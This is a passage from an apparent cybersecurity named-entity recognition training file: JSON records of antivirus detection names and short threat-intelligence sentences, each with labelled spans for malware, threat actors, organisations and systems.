"cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.BHO.89848 Trojan/BHO.gzx TSPY_BZUB.CN Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.FNXB TSPY_BZUB.CN Win.Trojan.Bho-4826 Trojan.Win32.BHO.gzx Trojan.Win32.BHO.cqlbw TrojWare.Win32.BHO.SR Trojan.MulDrop.20001 Trojan.BHO.Win32.3053 BehavesLike.Win32.Backdoor.mc W32/Trojan.RKCQ-8049 Trojan/BHO.csn Win32.Troj.BHO.kcloud Trojan.Heur.RP.E89CDE Trojan.Win32.BHO.gzx PWS:Win32/Cimuz.J Trojan/Win32.Inject.C94649 Trojan.BHO Win32/Spy.BZub.NFS Trojan.BHO!Tkmwppjy1xw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002543", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O TrojanDownloader.VB Troj.Banker.W32.Bancos.lgUF Trojan/Downloader.VB.iro Win32.Trojan.WisdomEyes.16070401.9500.9935 Win32/SillyDl.GEF Win.Trojan.Downloader-37507 Trojan-Downloader.Win32.VB.iro Trojan.Win32.VB.vrga Trojan.Win32.Downloader.69122.B TrojWare.Win32.Banker.etk74 Trojan.Show.34817 Downloader.VB.Win32.114 WORM_IRCBOT.SMOK BehavesLike.Win32.YahLover.ct TrojanDownloader.VB.gvh Trojan[Downloader]/Win32.VB Trojan-Downloader.Win32.VB.iro DoS:Win32/Pokanti.A Downloader/Win32.VB.R6537 TScope.Trojan.VB Win32.Trojan-downloader.Vb.Pdmc Trojan.DL.VB!zHigarbFEUc Trojan-Downloader.Win32.VB Win32/Trojan.Downloader.b8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002545", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Dropper.GO W97M/Downloader.aho W2KM_DLOADE.VHC Trojan.Script.MLW.dsmnja W2KM_DLOADE.VHC W97M/Downloader.aho HEUR.VBA.Trojan macro.ole.encodedownload.g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002546", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.PornoBlocker!O Trojan/PornoBlocker.adki Win32.Virus.Krap.a HV_RANSOM_CA222F78.TOMC Win.Trojan.Kryptik-1359 Trojan-Ransom.Win32.PornoBlocker.adki Trojan.Win32.Butirat.wyaex 
Trojan.Win32.A.PornoBlocker.197120.B ApplicUnwnt.Win32.Hoax.ArchSMS.SG BackDoor.Butirat.51 BehavesLike.Win32.PUPXAG.ch Trojan/PornoBlocker.chv Trojan[Ransom]/Win32.PornoBlocker Trojan.Kazy.DCA1D Trojan-Ransom.Win32.PornoBlocker.adki Trojan:Win32/Waprox.A Trojan/Win32.PornoBlocker.C156437 Hoax.PornoBlocker Trj/Pacrypt.D Trojan.PornoBlocker!0B81yxGeAIw Trojan.Win32.Waprox W32/Zbot.RO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002548", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBS.UAJ Trojan.VBS.UAJ Win32.Trojan.WisdomEyes.16070401.9500.9853 Trojan.VBS.UAJ Vbs.Trojan.Vbs.Ljjs Trojan.VBS.UAJ Trojan.VBS.UAJ Trojan.DownLoader19.25627 BehavesLike.Win32.Downloader.qh Trojan.Barys Trojan.MSIL.amcc Trojan.VBS.UAJ Trojan.VBS.UAJ Trojan.MSIL.Zapchast VBS/Shutdown.NAH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002549", "source": "cyner2_train"}} {"text": "A backdoor also known as: RTKT_SMALL.NLA RTKT_SMALL.NLA Trojan.Win32.Small.dplckv Adware.AdLoad.Win32.8710 BehavesLike.Win32.PUPXAX.lc Trojan.Zusy.D2BE63 Rootkit.Small!rTi0K4xzlKc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002550", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VodyDmpA.Worm Trojan/W32.Small.9265 RiskWare.Tool.CK Trojan/Pakes.c Win32.Trojan.WisdomEyes.151026.9950.9983 W32/Trojan.WZX TROJ_PAKES.JV Virus.Win32.Xorer.a Trojan.Win32.Pakes.bovph Trojan.Win32.Pakes.9261[h] Trojan.Dropper/Packed Win32.Virus.Xorer.Pkqs TrojWare.Win32.Patched.KSU Trojan.Rox Virus.Xorer.Win32.101 TROJ_PAKES.JV BehavesLike.Win32.Downloader.zc W32/Trojan.YUJV-5997 W32/Pakes.C!tr W32.Xorer.a!c Win-Trojan/Pakes.9265 Trojan.Pakes Virus.Win32.Xorer Clicker.BEHT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002552", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.GamesonTBDll1.Trojan Trojan.PWS.OnlineGames.ZLU Trojan-PWS/W32.WebGame.229376.BS 
Trojan.Tilcun.B7 Trojan.PWS.OnlineGames.ZLU Trojan/OnLineGames.arus TSPY_ONLINEG.FGF Win32.Trojan-PSW.OLGames.cc Infostealer.Gampass TSPY_ONLINEG.FGF Win.Spyware.45047-2 Trojan.PWS.OnlineGames.ZLU Trojan.PWS.OnlineGames.ZLU Trojan.Win32.OnLineGames.bemmm Trojan.Win32.PSWIGames.229376.Q Trojan.PWS.OnlineGames.ZLU TrojWare.Win32.PSW.OnLineGames.NOA Trojan.PWS.OnlineGames.ZLU Trojan.PWS.Gamania.11506 BehavesLike.Win32.Downloader.dh Trojan.Win32.Tilcun TR/Tilcun.B Win32.Troj.OnlineGameT.na.218624 Trojan.PWS.OnlineGames.ZLU Troj.GameThief.W32.OnLineGames.arus!c Trojan/Win32.OnlineGameHack.R2107 PWS-OnlineGames.br BScope.Trojan-PSW.Gomex.22 Win32/PSW.OnLineGames.NOA Win32.GamePsw.OnlineGame.bscx W32/OnLineGames.AKLO!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002554", "source": "cyner2_train"}} {"text": "BlackMoon Trojan is a banking trojan that is designed to phish user credentials from various South Korean banking institutions.", "spans": {"MALWARE: BlackMoon Trojan": [[0, 16]], "MALWARE: banking trojan": [[22, 36]], "ORGANIZATION: banking institutions.": [[106, 127]]}, "info": {"id": "cyner2_train_002556", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Script.9271 BAT.Trojan.KillFiles.h Win.Worm.530490-1 BAT.Conwonk BehavesLike.Win64.Downloader.qh BAT/KillWin.NAR Trojan.BAT.KillWin BAT/KillWin.NAR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002557", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Patched.Shopperz.1 Trojan.DllPatcher.A6 PTCH64_NOPLE.SM Trojan.Mentono!inf PTCH64_NOPLE.SM Trojan.Patched.Shopperz.1 Trojan.Win64.Patched.qw Trojan.Patched.Shopperz.1 Trojan.Patched.Shopperz.1 Trojan.Hosts.37524 Trojan.Patched.Shopperz Trojan/Win64.Patched.ap Trojan.Patched.Shopperz.1 Trojan.Win64.Patched.qw W64/Patched.AP!tr Win32/Trojan.133", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002558", "source": "cyner2_train"}} {"text": "A 
malicious Word document targeting Mac users.", "spans": {"SYSTEM: Mac users.": [[36, 46]]}, "info": {"id": "cyner2_train_002559", "source": "cyner2_train"}} {"text": "It also targets Ahnlab by killing processes and deleting files specific to the software.", "spans": {"ORGANIZATION: Ahnlab": [[16, 22]], "SYSTEM: software.": [[79, 88]]}, "info": {"id": "cyner2_train_002560", "source": "cyner2_train"}} {"text": "BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.", "spans": {"THREAT_ACTOR: BlackTech": [[0, 9]], "THREAT_ACTOR: cyber espionage group": [[15, 36]]}, "info": {"id": "cyner2_train_002561", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Affpach.A4 Trojan.Graftor.D6130 Win32.Trojan.StartPage.a W32/Trojan2.NTSB TROJ_SPNR.30BF13 Trojan.Win32.AVKill.bfnuts Trojan.Win32.Inject.tja Trojan.AVKill.27746 TROJ_SPNR.30BF13 W32/Trojan.ZXAC-7369 Variant.Graftor.xm Win32/StartPage.OKV Trojan.StartPage!m0gBcMRinXU Trojan.Hijacker W32/StartPage.OKV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002563", "source": "cyner2_train"}} {"text": "Threat Actors TAs employ sophisticated techniques to create phishing websites that are designed to appear legitimate and attractive to users.", "spans": {"THREAT_ACTOR: Threat Actors TAs": [[0, 17]]}, "info": {"id": "cyner2_train_002564", "source": "cyner2_train"}} {"text": "BianLian continues to exhibit a high level of operational security and skill in network penetration, seeming to have also found their stride in the pace of their operations.", "spans": {}, "info": {"id": "cyner2_train_002565", "source": "cyner2_train"}} {"text": "A backdoor also known as: VEX8687.Webshell Backdoor.PHP.RST.H HTML.BackDoor.A Backdoor.Php.Rst!c PHP.Backdoor.WebShell.al PHP/Rst.H PHP.RSTBackdoor PHP/Small.NAL PHP_R57SHELL.SM Win.Trojan.R57-2 Script.Trojan.PHPShellRST.A Backdoor.PHP.RST.H Trojan.Html.Rst.bgzarv 
PHP.S.Rst.87741 Backdoor.PHP.RST.H Backdoor.PHP.Rst.~BBA Backdoor.PHP.RST.H PHP.R57Shell.12 PHP_R57SHELL.SM PHP/Rst.H PHP/Rst.H.95982 Backdoor.PHP.RST.H PHP/Rst.A Backdoor.PHP.r57Shell.A BPX.Shell Backdoor.PHP.Rst.ai Php.Backdoor.Rst.Ssgx PHP.RST.G Trojan.PHP.Rst PHP/Rst.AI!tr php.script.c99shell.6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002566", "source": "cyner2_train"}} {"text": "Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: group": [[32, 37]], "MALWARE: Trojan": [[127, 133]], "MALWARE: ISMDoor.": [[141, 149]]}, "info": {"id": "cyner2_train_002567", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Adware.AMRL Trojan.DownLoader22.55869 BehavesLike.Win32.Worm.th W32/Adware.OAXQ-2836 Worm:Win32/Imafly.AC Trojan.Strictor.D19956 Trojan/Win32.Cosmu.R158790 Win32/Autoit.LH Worm.Win32.AutoIt W32/Autoit.EQP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002570", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Worm.Goldrv.A7 Trojan-Ransom.Win32.Blocker.jaic Trojan.Win32.Dapato.dbzcxx W32.Virut.lMey Trojan.Win32.Dapato.a TrojWare.Win32.Dapato.DFS Trojan.DownLoader11.18798 Trojan-Dropper.Win32.Dapato TrojanDropper.Dapato.peb Trojan[Dropper]/Win32.Dapato Worm:Win32/Goldrv.A Trojan-Ransom.Win32.Blocker.jaic HEUR/Fakon.mwf Trojan-Ransom.Blocker Backdoor.Bot W32/Dapato.EDU!tr Win32/Trojan.df8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002571", "source": "cyner2_train"}} {"text": "The malware used in this campaign has similar features to that distributed earlier in 2017 with the following changes: A new decoy document copy/pasted from an article published on the 3rd of July by Yonhap News Agency in Korea;", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: 
campaign": [[25, 33]], "ORGANIZATION: Yonhap News Agency": [[200, 218]]}, "info": {"id": "cyner2_train_002572", "source": "cyner2_train"}} {"text": "The Computer Incident Response Center Luxembourg CIRCL has recently uncovered malicious files attached to an email through the use of Pandora Document and File Analysis.", "spans": {"ORGANIZATION: The Computer Incident Response Center Luxembourg CIRCL": [[0, 54]]}, "info": {"id": "cyner2_train_002575", "source": "cyner2_train"}} {"text": "New variant of the Android rootnik malware that disguises itself as a legal app.", "spans": {"MALWARE: variant": [[4, 11]], "MALWARE: Android rootnik malware": [[19, 42]], "SYSTEM: legal app.": [[70, 80]]}, "info": {"id": "cyner2_train_002576", "source": "cyner2_train"}} {"text": "Using google translate, I found that the language is Armenian and translates to The Law on Banks and Banking 27.07.2015.doc VirusTotal intelligence spotted the decoy in the wild as an email attachment with the subject name Law changes which gave me a suspicion that the attempt was made to specifically target the employees of Central bank of Armenia.", "spans": {"SYSTEM: google translate,": [[6, 23]], "ORGANIZATION: VirusTotal intelligence": [[124, 147]], "ORGANIZATION: employees": [[314, 323]], "ORGANIZATION: Central bank of Armenia.": [[327, 351]]}, "info": {"id": "cyner2_train_002577", "source": "cyner2_train"}} {"text": "Everything started from a well edited Italian language email given to me from a colleague of mine, thank you Luca! 
reaching out many Italian companies.", "spans": {"ORGANIZATION: Italian companies.": [[133, 151]]}, "info": {"id": "cyner2_train_002579", "source": "cyner2_train"}} {"text": "BEBLOH is a banking Trojan that has been around since as early as 2009.", "spans": {"MALWARE: BEBLOH": [[0, 6]], "MALWARE: banking Trojan": [[12, 26]]}, "info": {"id": "cyner2_train_002580", "source": "cyner2_train"}} {"text": "The actor utilizes spear phishing campaigns to deliver NetTraveler, also known as TravNet.", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "THREAT_ACTOR: spear phishing campaigns": [[19, 43]], "MALWARE: NetTraveler,": [[55, 67]], "MALWARE: TravNet.": [[82, 90]]}, "info": {"id": "cyner2_train_002581", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.PcClient.409260 Trojan.Pincav.9356 Backdoor.PcClient.Win32.5 Backdoor/PcClient.alqk Trojan.Buzy.D10B5 W32/Backdoor.MMJP-0040 Backdoor.Trojan Trojan.Win32.PcClient.ihgd Trojan.MulDrop3.45818 Backdoor.Win32.PcClient W32/Backdoor2.FUIH Trojan:Win32/Wisp.A BDS/Pcclient.alqk Trojan[Backdoor]/Win32.PcClient Backdoor.Win32.A.PcClient.386732 Trojan/Win32.PcClient.R55121 Backdoor.PcClient Backdoor.PcClient!4LPCxDv4AHg Win32/Backdoor.851", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002582", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 BehavesLike.Win64.MysticCompressor.ch Trojan:Win64/Jifcapi.A Win32/Trojan.03e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002584", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.PWS.Steam.12700 BehavesLike.Win32.Trojan.bc TR/Dropper.MSIL.dhgqe Spyware.AzorUlt Trj/GdSda.A Trojan.MSIL.Krypt MSIL/Kryptik.MPY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002585", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AlustinH.Trojan Trojan.Diacam.KL3 Trojan.VB.Win32.96905 
Trojan/VB.qms TROJ_DIACAM_BK0846C6.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9992 TROJ_DIACAM_BK0846C6.TOMC Win.Trojan.Mokes-11 Trojan.Win32.Dwn.coomze TrojWare.Win32.VB.QMS Trojan.DownLoader6.45576 Trojan/Jorik.glae Trojan/Win32.Mokes Trojan:Win32/Diacam.A Trojan.Symmi.D23C3 Win32.Trojan.VB.BE Trojan/Win32.VBKrypt.C161437 Trojan.Mokes Win32/VB.QMS Win32.VBCrypt W32/VBKrypt.MBSX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002587", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Packed.16 Win32/Pigeon.AZTT Win.Trojan.Packed-77 Backdoor.Win32.Hupigon.oqk Trojan.Win32.Crypt.mkur Backdoor.Win32.Hupigon.412672.K Win32.Backdoor.Hupigon.cuda Packed.Win32.Klone.~KMF BackDoor.Pigeon.20533 Backdoor.Hupigon.Win32.100099 BehavesLike.Win32.Fujacks.fc Backdoor/Hupigon.af Win32.Troj.Klone.ab.389660 Trojan/Win32.Malpacked5.R134022 Trojan-Dropper.Kaos Trojan.Win32.Pincav", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002588", "source": "cyner2_train"}} {"text": "In some cases, it appeared to be a single use domain shadowing which is incredibly difficult to stop by using blacklisting.", "spans": {}, "info": {"id": "cyner2_train_002589", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.VP.ED105D0 Win32.Trojan.WisdomEyes.16070401.9500.9911 Trojan.MulDrop4.19536 BehavesLike.Win32.VBObfus.nt TR/Spy.36864.1691 Win32/VB.OIX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002590", "source": "cyner2_train"}} {"text": "Since our first published analysis of the OilRig campaign in May 2016 Unit42 has continued to monitor this group for new activity.", "spans": {"THREAT_ACTOR: the OilRig campaign": [[38, 57]], "ORGANIZATION: Unit42": [[70, 76]], "THREAT_ACTOR: group": [[107, 112]]}, "info": {"id": "cyner2_train_002591", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Dapato!O 
Trojan.Symmi.D6404 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan-Dropper.Win32.Dapato.buqu Trojan.Win32.Dapato.bcmajb Trojan.DownLoader7.19485 BehavesLike.Win32.BadFile.mm W32/Trojan.IAVK-8796 TrojanDropper.Dapato.mbp TR/Dapato.AG Win32.Troj.Dapato.bu.kcloud Trojan:Win32/Omdork.A Trojan-Dropper.Win32.Dapato.buqu Trojan/Win32.Inject.R46970 Trojan.Win32.Swisyn W32/Dapato.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002592", "source": "cyner2_train"}} {"text": "More and more we've been seeing references to a malware family known as FormBook.", "spans": {"MALWARE: a malware family": [[46, 62]], "MALWARE: FormBook.": [[72, 81]]}, "info": {"id": "cyner2_train_002593", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.6632 PUP.Optional.Nosibay TROJ_GE.FF4D51A5 Adware.Downware.11318 virus.win32.sality.at PUA/BubbleDock.A PUP.Nosibay/Variant NSIS.Application.SilentInstaller.A Win32.Trojan.Bubbledock.Huzb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002595", "source": "cyner2_train"}} {"text": "These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.", "spans": {"SYSTEM: Google Play store,": [[37, 55]]}, "info": {"id": "cyner2_train_002599", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.PWS.Banker1.23807 TR/Crypt.ZPACK.qkbzo Trojan:Win32/Ahriynoteemo.A Trojan-Spy.Win32.Noon Trj/CI.A Win32/Trojan.1fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002601", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Mauvaise.SL1 Trojan.Skeeyah W32.SillyFDC Trojan.Win32.Bulknet.eljnif TrojWare.Win32.Imwee.A Trojan.DownLoader11.19812 Trojan.Zusy.D38629 TrojanDownloader:Win32/Gratem.A HEUR/Fakon.mwf Trj/Downloader.WKR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002604", "source": 
"cyner2_train"}} {"text": "A worm Madang infects files across all drives, and installs itself as serverx.exe", "spans": {"MALWARE: worm Madang": [[2, 13]], "SYSTEM: drives,": [[39, 46]]}, "info": {"id": "cyner2_train_002605", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.MosquitoQKB.Fam.Trojan Trojan.Kryptik.Win32.93516 Trojan/Kryptik.kuf BKDR_QAKBOT.SMG Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_QAKBOT.SMG Win.Trojan.5453446-1 Trojan-Ransom.Win32.Gimemo.dtt Trojan.Win32.Crypted.efbdjj Trojan.Packed.21485 BehavesLike.Win32.HLLP.dc Trojan:Win32/Dishigy.B Trojan-Ransom.Win32.Gimemo.dtt Trojan/Win32.Zbot.R2835 Trojan.Flasher.xr Worm.Win32.Slenfbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002606", "source": "cyner2_train"}} {"text": "This attack was specifically targeting a well-known financial services firm.", "spans": {"ORGANIZATION: financial services firm.": [[52, 76]]}, "info": {"id": "cyner2_train_002607", "source": "cyner2_train"}} {"text": "Cmstar was named for the log message CM**' used by the downloader.", "spans": {"MALWARE: Cmstar": [[0, 6]], "MALWARE: downloader.": [[55, 66]]}, "info": {"id": "cyner2_train_002608", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.ASP.Ace.B Backdoor.ASP.Ace.B ASP/Ace.C Backdoor.Trojan Ace.B HTML_Haiyasp.a Backdoor.ASP.Ace.b Backdoor.ASP.Ace.B Backdoor.ASP.Ace.b Backdoor.ASP.Ace.B BDS/ASP.Ace.E HTML_Haiyasp.a Backdoor/ASP.Ace.b Backdoor/ASP.Ace Backdoor:ASP/Ace.B Backdoor.ASP.Ace.B ASP/Ace.C Backdoor.ASP.Ace.b Backdoor.Trojan ASP/Ace.B Script.haiyang.a Bck/Ace.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002611", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.NtRootKit.bozxzq TrojWare.Win32.Rootkit.Festi.AA Trojan.NtRootKit.15667 BehavesLike.Win32.Dropper.mm Trojan.Win32.Rootkit Trojan[Rootkit]/Win32.Tent TrojanDropper:Win32/Festi.C 
SScope.Trojan.CLR.18907 W32/Rootkit_Festi.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002614", "source": "cyner2_train"}} {"text": "In-depth reverse engineering revealed the APK contained an Android variant of X-Agent, the command and control protocol was closely linked to observed Windows variants of X-Agent, and utilized a cryptographic algorithm called RC4 with a very similar 50 byte base key.", "spans": {"SYSTEM: APK": [[42, 45]], "MALWARE: Android variant of X-Agent,": [[59, 86]], "SYSTEM: Windows": [[151, 158]], "MALWARE: variants of X-Agent,": [[159, 179]]}, "info": {"id": "cyner2_train_002615", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.Cidox!O Trojan/Cidox.bpa TROJ_VUNDO.SMFQ Win32.Trojan.WisdomEyes.16070401.9500.9988 TROJ_VUNDO.SMFQ Trojan.Win32.Mayachok.esnzar Trojan.Mayachok.1 Dropper.Cidox.Win32.14633 BehavesLike.Win32.PUPXDR.ph Trojan-Dropper.Win32.Cidox Trojan.Symmi.DD688 TrojanDownloader:Win32/Vundo.HIY Trojan/Win32.Cidox.R20237 Trojan-Ransom.Cidox.1212 Win32/Trojan.1b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002616", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Virut.G W32/Trojan3.ATP W32.Virut.CF W32/Virut.BS Win32/Virut.17408 PE_VIRUX.A-3 Virus.Win32.Virut.ce Win32.Virut.AM Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.A-3 Heuristic.BehavesLike.Win32.ModifiedUPX.J Win32/Virut.bn Win32.Virut.nd.53248 Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan3.ATP Virus.Virut.06 Win32/Virut.NBP Win32.Obduran.a W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002617", "source": "cyner2_train"}} {"text": "It then uses open-sourced Android root exploit tools to gain root access on an Android device.", "spans": {"MALWARE: Android root exploit tools": [[26, 52]], "VULNERABILITY: gain root access": [[56, 72]], "SYSTEM: Android device.": [[79, 94]]}, "info": {"id": "cyner2_train_002618", "source": 
"cyner2_train"}} {"text": "The actors weaponized the delivery document to install a variant of the 9002' Trojan called 3102' that heavily relies on plugins to provide functionality needed by the actors to carry out on their objectives.", "spans": {"THREAT_ACTOR: The actors": [[0, 10]], "MALWARE: Trojan": [[78, 84]], "MALWARE: 3102'": [[92, 97]], "THREAT_ACTOR: actors": [[168, 174]]}, "info": {"id": "cyner2_train_002619", "source": "cyner2_train"}} {"text": "Spearphishes impersonating RAND", "spans": {"ORGANIZATION: RAND": [[27, 31]]}, "info": {"id": "cyner2_train_002620", "source": "cyner2_train"}} {"text": "KeyRaider targets jailbroken iOS devices and is distributed through third-party Cydia repositories in China.", "spans": {"MALWARE: KeyRaider": [[0, 9]], "VULNERABILITY: jailbroken": [[18, 28]], "SYSTEM: iOS devices": [[29, 40]], "SYSTEM: Cydia repositories": [[80, 98]]}, "info": {"id": "cyner2_train_002621", "source": "cyner2_train"}} {"text": "The malware, dubbed CopyCat by researchers, uses a novel technique to generate and steal ad revenues.", "spans": {"MALWARE: malware,": [[4, 12]], "MALWARE: CopyCat": [[20, 27]], "ORGANIZATION: researchers,": [[31, 43]]}, "info": {"id": "cyner2_train_002622", "source": "cyner2_train"}} {"text": "The criminal gangs of the Carbanak/FIN7 syndicate have been attributed to numerous intrusions in the banking, hospitality, retail and other industrial verticals, collecting financial information of all kinds.", "spans": {"THREAT_ACTOR: The criminal gangs": [[0, 18]], "THREAT_ACTOR: the Carbanak/FIN7 syndicate": [[22, 49]], "ORGANIZATION: the banking, hospitality, retail": [[97, 129]], "ORGANIZATION: other industrial verticals,": [[134, 161]]}, "info": {"id": "cyner2_train_002624", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 LNK/Trojan.XMFH-4 Worm.Win32.AutoIt.aku Worm.W32.Autoit!c LNK_DORKBOT.SMF Trojan/Win32.Autoit Trojan.Autoit.DHZ Worm.Win32.AutoIt.aku 
Trojan:Win32/Chinqincin.A Win32.Worm.Autoit.Lndx Trj/CI.A Win32/Trojan.1e1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002625", "source": "cyner2_train"}} {"text": "However, only the Georgian language portion of the website was impacted and used in an effort to distribute malware.", "spans": {"MALWARE: malware.": [[108, 116]]}, "info": {"id": "cyner2_train_002627", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Win32.Veebee.1!O Trojan.Dyname.r3 Trojan.Dropper Trojan.VB.Win32.118717 Trojan.VB!K6eQMCc/nZg Trojan.Win32.VB.ckbb Worm.Win32.WBNA.ROC TR/Dynamer.dtc.17594 W32/Trojan.MKPV-4364 Trojan/Win32.VB Trojan.VB Win32/AutoRun.VB.BDM Trojan-Banker.Win32.Bancos W32/VB.CKBB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002628", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan/W32.Cobalt.196608 Trojan.Conbea Win.Tool.CobaltStrike-6336852-0 HackTool.Win32.Cobalt.k Trojan.Win32.Cobalt.egtrej BackDoor.Meterpreter.42 BehavesLike.Win32.Backdoor.ch HackTool.CobaltStrike HackTool/Win32.Cobalt Trojan.Application.HackTool.CobaltStrike.1 HackTool.Win32.Cobalt.k HackTool/Win32.Cobalt.R197271 TrojanDownloader.Agresbeak RiskWare.HackTool Riskware.HackTool!t96XHdFe7u4 W32/CobaltStrike_Beacon.A!tr Win32/Application.Hacktool.e79", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002631", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D1A90 Win32.Trojan.Kryptik.afz Trojan.Proxy2.1039 BehavesLike.Win32.BadFile.lc Trojan-Dropper.Win32.Injector TR/Obfuscated.sarli Trojan:Win32/Riern.M TScope.Malware-Cryptor.SB Win32/Trojan.Downloader.9c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002633", "source": "cyner2_train"}} {"text": "Talos has named this malware KONNI.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: malware KONNI.": [[21, 35]]}, "info": {"id": "cyner2_train_002634", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: Application.MiniFtp.A Server-FTP.Win32.MiniFTP!O Backdoor.Banito.Win32.283 Backdoor/Banito.nk Application.MiniFtp.A Win32.Trojan.WisdomEyes.16070401.9500.9964 W32/VirTool.CJ Win.Trojan.Miniftp-1 Application.MiniFtp.A not-a-virus:Server-FTP.Win32.MiniFTP.c Application.MiniFtp.A Trojan.Win32.Banito.xnaq Backdoor.Win32.Banito.81920[h] Application.MiniFtp.A Backdoor.Win32.Banito.nk0 BackDoor.Bandito.2207 W32/Tool.XUIH-6856 Hacktool.Miniftp APPL/MiniFTP.A RiskWare[Server-FTP]/Win32.MiniFTP.c Backdoor.W32.Banito.lx25 Backdoor:Win32/Shesmi.A Unwanted/Win32.MiniFTP.R63415 Backdoor.Sdbot!9v31gLa9+gE Backdoor.Win32.Formador.b W32/FTPMini.A!tr Bck/Formador.B Win32/Backdoor.662", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002635", "source": "cyner2_train"}} {"text": "This pulse includes indicators from this analysis, and indicators from other campaigns that employ related malware.", "spans": {"ORGANIZATION: pulse": [[5, 10]], 